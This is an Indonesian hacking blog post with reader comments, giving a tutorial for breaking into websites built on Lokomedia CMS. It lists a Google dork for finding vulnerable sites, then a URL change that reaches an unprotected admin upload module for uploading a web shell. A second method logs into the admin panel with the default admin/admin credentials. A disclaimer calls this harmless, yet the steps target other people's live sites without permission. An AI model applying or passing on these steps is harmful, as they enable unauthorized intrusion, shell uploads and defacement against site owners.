Bug CMS Lokomedia | Cara Bug CMS Lokomedia
Langsung saja...
1. masuk google www.google.com
2. Masukan dork ini "inurl:semua-download.html" tanpa kutip 2
3. setelah menemukan target ex: www.site.com/semua-download.html
Inject : ganti semua-download.html jadi adminweb/content.php?module=download
Ex : www.site.com/semua-download.html menjadi www.site.com/adminweb/content.php?module=download
kalau terdapat bugnya nanti ada file file yg sudah diupload , dan ada tulisan Tambah Download dan upload Shell nya
Cara ke 2
Dork : inurl:semua-download.html
Inject : /adminweb/
ex: site.com/semua-download.html
menjadi site.co/adminweb/
biasanya para admin melakukan kesalahan dengan menggunakan user dan password default
User : admin
Pass : admin
Jika disalah satu web target adminnya lengah kita bisa masuk ke modul admin..
INI BUKAN MERUSAK , INI HANYA MENCARI KELEMAHAN PADA ADMIN..!!
SPECIAL THANKZ TO http://travismarkshihab.blogspot.com/
Next
« Prev Post
« Prev Post
Previous
Next Post »
Next Post »
Langganan:
Posting Komentar (Atom)
5 komentar
Click here for komentartest
Balasbagus informasinya.
Balaspatut dicoba..,
numpang gan.
Balastpi bagus itu informasinya..
bagus info nya..
Balasmampir ada info yang menarik..
Tiba tiba rame yang komentar ada apa nih :D hhe , makasih yaa
BalasTerima Kasih telah meluangkan waktu anda untuk melihat blog ini, tinggalkan lah jejak komentar anda dengan berkomentar disini ' :D
Kayuagung Cyber Team | Berita Cyber | Cyber News | Teknologi IT | JKT48 Voice Alarm | Photoshop | Desain | Hacking | Tutorial Deface | Web HTML | All About Cyber Out Of Topic Show Konversi KodeHide Konversi Kode Show EmoticonHide Emoticon